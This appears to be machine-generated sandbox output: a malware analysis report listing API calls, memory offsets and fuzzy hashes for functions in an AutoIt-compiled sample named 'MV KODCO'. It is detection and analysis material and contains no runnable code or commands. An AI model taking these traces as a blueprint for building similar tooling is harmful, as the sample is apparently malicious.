                                                          • Instruction Fuzzy Hash: 8B112E3570DF73BAE7246A54AC42DAB239F9F16310F30003AF502E53C1E7F499004A69
                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0062A806
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ArraySafeVartype
                                                          • String ID:
                                                          • API String ID: 1725837607-0
                                                          • Opcode ID: bb80b6e4e6cdfa10bb7055b33307a2a44b12d9379b014a7dc6d9a17d2f8fed00
                                                          • Instruction ID: c72d3ccfa7b9dad176ba67835f0073127421d9535b59afd85a6330069ec5adc4
                                                          • Opcode Fuzzy Hash: bb80b6e4e6cdfa10bb7055b33307a2a44b12d9379b014a7dc6d9a17d2f8fed00
                                                          • Instruction Fuzzy Hash: 79C17B75A0062A9FDB00CF98E585BAEB7F6FF08311F20446AE605E7341D7B4A942CF95
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00626B63
                                                          • LoadStringW.USER32(00000000), ref: 00626B6A
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00626B80
                                                          • LoadStringW.USER32(00000000), ref: 00626B87
                                                          • _wprintf.LIBCMT ref: 00626BAD
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00626BCB
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00626BA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: b247b0f3d8022b63ae7e4f8965c04556651d42d85900c325d7b06ffca3b594f8
                                                          • Instruction ID: 66e36c65eb960a158aba7bf5ed36394e83f2f231ed2f9b949a407b4ba7b957d9
                                                          • Opcode Fuzzy Hash: b247b0f3d8022b63ae7e4f8965c04556651d42d85900c325d7b06ffca3b594f8
                                                          • Instruction Fuzzy Hash: 430181F6A00258BFEB11ABA0DD89EF7776DDB08304F0044A1F746E2041EAB49E848F70
                                                          APIs
                                                            • Part of subcall function 00643C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00642BB5,?,?), ref: 00643C1D
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00642BF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BuffCharConnectRegistryUpper
                                                          • String ID:
                                                          • API String ID: 2595220575-0
                                                          • Opcode ID: 7c800dd410bc4008109a03402a28bf6c2652c4b97690acf27dd06521cda14567
                                                          • Instruction ID: 2943190c09d79616c5e4231843680df18efd40536af0fff83ee7c601ae378d48
                                                          • Opcode Fuzzy Hash: 7c800dd410bc4008109a03402a28bf6c2652c4b97690acf27dd06521cda14567
                                                          • Instruction Fuzzy Hash: A891AE71604202AFC704EF15C895B6EBBE6FF88310F54881DF99697291DB74E905CF46
                                                          APIs
                                                          • select.WSOCK32 ref: 00639691
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0063969E
                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 006396C8
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006396E9
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 006396F8
                                                          • inet_ntoa.WSOCK32(?), ref: 00639765
                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 006397AA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$htonsinet_ntoaselect
                                                          • String ID:
                                                          • API String ID: 500251541-0
                                                          • Opcode ID: ad94305d0c47155b379e6bc6dbeeff67d02ff351d02b8cc67fba7dce5178dc76
                                                          • Instruction ID: 01f3cc2dcf6471d2641848db729cfd8274c05451e854d2c5c4ac147427af5f74
                                                          • Opcode Fuzzy Hash: ad94305d0c47155b379e6bc6dbeeff67d02ff351d02b8cc67fba7dce5178dc76
                                                          • Instruction Fuzzy Hash: 7671DD31504241ABC314EF65CC89E6BBBEAFFC5714F104A1CF596972A1DBB0D905CBA2
                                                          APIs
                                                          • __mtinitlocknum.LIBCMT ref: 0060A991
                                                            • Part of subcall function 00607D7C: __FF_MSGBANNER.LIBCMT ref: 00607D91
                                                            • Part of subcall function 00607D7C: __NMSG_WRITE.LIBCMT ref: 00607D98
                                                            • Part of subcall function 00607D7C: __malloc_crt.LIBCMT ref: 00607DB8
                                                          • __lock.LIBCMT ref: 0060A9A4
                                                          • __lock.LIBCMT ref: 0060A9F0
                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00696DE0,00000018,00615E7B,?,00000000,00000109), ref: 0060AA0C
                                                          • EnterCriticalSection.KERNEL32(8000000C,00696DE0,00000018,00615E7B,?,00000000,00000109), ref: 0060AA29
                                                          • LeaveCriticalSection.KERNEL32(8000000C), ref: 0060AA39
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                          • String ID:
                                                          • API String ID: 1422805418-0
                                                          • Opcode ID: 0ba14a86ab99f7c58381a7f385169e8cd4cba5ef98ff53bf8c44cc518d08769b
                                                          • Instruction ID: 1eda7e68148e1b0b16899d20600955ea81c1955bad4db562589fe95c108edb7f
                                                          • Opcode Fuzzy Hash: 0ba14a86ab99f7c58381a7f385169e8cd4cba5ef98ff53bf8c44cc518d08769b
                                                          • Instruction Fuzzy Hash: A1412771F803019BEB189FE8CA4479FB7A2AF01374F10821CE425AB2D1D7B49941CB95
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00648EE4
                                                          • GetDC.USER32(00000000), ref: 00648EEC
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00648EF7
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00648F03
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00648F3F
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00648F50
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0064BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00648F8A
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00648FAA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 41aa4cf5d0c12080be3707ec95eab50f9a94793121895fd71a0a6b445d9196ff
                                                          • Instruction ID: 40da5e71efdd6e005c44bebb90b1d0a65b9103bce6345f1a5c62ef67a6d8318f
                                                          • Opcode Fuzzy Hash: 41aa4cf5d0c12080be3707ec95eab50f9a94793121895fd71a0a6b445d9196ff
                                                          • Instruction Fuzzy Hash: 49315C72600214BFEB118F54CC8AFEB3BAEEF49755F044065FE09DA291DAB59841CBB4
                                                          APIs
                                                            • Part of subcall function 005FB34E: GetWindowLongW.USER32(?,000000EB), ref: 005FB35F
                                                          • GetSystemMetrics.USER32(0000000F), ref: 0065016D
                                                          • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0065038D
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006503AB
                                                          • InvalidateRect.USER32(?,00000000,00000001,?), ref: 006503D6
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006503FF
                                                          • ShowWindow.USER32(00000003,00000000), ref: 00650421
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00650440
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                          • String ID:
                                                          • API String ID: 3356174886-0
                                                          • Opcode ID: b0872ec2457e119bd05f3b7af97e94238ec7bfbf99120d6f859d35eebe1cd7fa
                                                          • Instruction ID: 2b3a741513b450e2c74b5d1c85c3c08419e998b969f29e45448fa615f32b4f73
                                                          • Opcode Fuzzy Hash: b0872ec2457e119bd05f3b7af97e94238ec7bfbf99120d6f859d35eebe1cd7fa
                                                          • Instruction Fuzzy Hash: EAA18A35600616EBEB18CF68C9897EDBBB2BF08742F088125EC55EB290D774ED55CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 51393c96d2f2d97db4207b28fbb9cae9383ee9fd572da8a1eb6d93801e03d8ea
                                                          • Instruction ID: d76f0aa59cf780d125b17318a81748661047aa1d640bb9882c67482eeee9477d
                                                          • Opcode Fuzzy Hash: 51393c96d2f2d97db4207b28fbb9cae9383ee9fd572da8a1eb6d93801e03d8ea
                                                          • Instruction Fuzzy Hash: 18716BB5900109EFDB04CF98CC89ABEBF79FF85314F148149FA19AB254C734AA41CB62
                                                          APIs
                                                          • _memset.LIBCMT ref: 0064225A
                                                          • _memset.LIBCMT ref: 00642323
                                                          • ShellExecuteExW.SHELL32(?), ref: 00642368
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                            • Part of subcall function 005FC6F4: _wcscpy.LIBCMT ref: 005FC717
                                                          • CloseHandle.KERNEL32(00000000), ref: 0064242F
                                                          • FreeLibrary.KERNEL32(00000000), ref: 0064243E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 4082843840-2766056989
                                                          • Opcode ID: 6f0a7f82b0fb3d5afb60b9162f98b6d7b31fe55ae7848d9573cc51c59dae42d7
                                                          • Instruction ID: e68751b8379cdba00ced3828848b4bc74d655b037a7299bcb252fe4b7904a549
                                                          • Opcode Fuzzy Hash: 6f0a7f82b0fb3d5afb60b9162f98b6d7b31fe55ae7848d9573cc51c59dae42d7
                                                          • Instruction Fuzzy Hash: 64717E74A0061A9FCF09EFA5C9959AEBBF6FF48310F108459F855AB391CB34AD40CB94
                                                          APIs
                                                          • GetParent.USER32(?), ref: 00623DE7
                                                          • GetKeyboardState.USER32(?), ref: 00623DFC
                                                          • SetKeyboardState.USER32(?), ref: 00623E5D
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00623E8B
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00623EAA
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00623EF0
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00623F13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 3574cc04c75edd80f7e3f419e9c47286def9c41d5410919a665696965fed775c
                                                          • Instruction ID: 62afd65235d58c71f4e443f1107b5d07c3fa0b885e195c7d19c5d03614fba474
                                                          • Opcode Fuzzy Hash: 3574cc04c75edd80f7e3f419e9c47286def9c41d5410919a665696965fed775c
                                                          • Instruction Fuzzy Hash: FE51E5A0A04BF53DFB364224AC45BF67EAA5F06304F08448EE1D546AD2D7989EC8DF50
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 00623C02
                                                          • GetKeyboardState.USER32(?), ref: 00623C17
                                                          • SetKeyboardState.USER32(?), ref: 00623C78
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00623CA4
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00623CC1
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00623D05
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00623D26
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: cf7e12c64d61df0a2ac9a867b089c0d2836558de5c81cff4688f08484ac96d4f
                                                          • Instruction ID: 274c6129793d1972274dd47c9bb9dd72afa0482c645db5be51df42dd7a2755a0
                                                          • Opcode Fuzzy Hash: cf7e12c64d61df0a2ac9a867b089c0d2836558de5c81cff4688f08484ac96d4f
                                                          • Instruction Fuzzy Hash: EE51E9A0604BF53DFB3247249C55BF67E9A6F06300F088889E1D5567C2D798EE94EB50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: 4c66ad3a5643472e409104a445efcc38cf52d45ed1804407e384d554026a9a49
                                                          • Instruction ID: 983f4f8388be266d2a61b4ce17a463a5370e7bd4c1e2c4803df1aaf58baae948
                                                          • Opcode Fuzzy Hash: 4c66ad3a5643472e409104a445efcc38cf52d45ed1804407e384d554026a9a49
                                                          • Instruction Fuzzy Hash: 7841A166C54614B6DF54EBF4CC4AACFB3AE9F05310F1189ABE504F3161FA34EA1087A9
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00643DA1
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00643DCB
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00643E80
                                                            • Part of subcall function 00643D72: RegCloseKey.ADVAPI32(?), ref: 00643DE8
                                                            • Part of subcall function 00643D72: FreeLibrary.KERNEL32(?), ref: 00643E3A
                                                            • Part of subcall function 00643D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00643E5D
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00643E25
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: d8aecb97b937d175c2921b32244f65cc37431bdf6c5686815f6ac63e87d6de9d
                                                          • Instruction ID: caa34b8888b95aba73c97afff6c243f101c0633b96946ef5a8be90aa0ab62749
                                                          • Opcode Fuzzy Hash: d8aecb97b937d175c2921b32244f65cc37431bdf6c5686815f6ac63e87d6de9d
                                                          • Instruction Fuzzy Hash: E931EBB1E01119BFDB159F94DC85AFFB7BEEF08300F00056AE512A2251D7B49F899BA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00648FE7
                                                          • GetWindowLongW.USER32(00E2F188,000000F0), ref: 0064901A
                                                          • GetWindowLongW.USER32(00E2F188,000000F0), ref: 0064904F
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00649081
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006490AB
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 006490BC
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006490D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: ad32fc1952768983fa6441897fdb144f3fedcb009b0192ae05744ecddef5210e
                                                          • Instruction ID: a4dc08759407097cee95e472d585717dedbde0f57d0aba1427e187785089673c
                                                          • Opcode Fuzzy Hash: ad32fc1952768983fa6441897fdb144f3fedcb009b0192ae05744ecddef5210e
                                                          • Instruction Fuzzy Hash: 21313434680214AFDB208F58DC84FA637A6FB4AB54F146168F619CF2B1CBB1AC40CF50
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006208F2
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00620918
                                                          • SysAllocString.OLEAUT32(00000000), ref: 0062091B
                                                          • SysAllocString.OLEAUT32(?), ref: 00620939
                                                          • SysFreeString.OLEAUT32(?), ref: 00620942
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00620967
                                                          • SysAllocString.OLEAUT32(?), ref: 00620975
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 60ab2e0088baa6f911d6357fdfea6b4da95369d80d380d914f2dda4632ca8255
                                                          • Instruction ID: 089568eaff9b401d9bd6992b5afa650b3e8154186f44ac1674d8860b4899794d
                                                          • Opcode Fuzzy Hash: 60ab2e0088baa6f911d6357fdfea6b4da95369d80d380d914f2dda4632ca8255
                                                          • Instruction Fuzzy Hash: 9C219776A01619AFAB109F78DC88DFB77EDEB09360B008125F915DB252D674EC45CB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 1038674560-2734436370
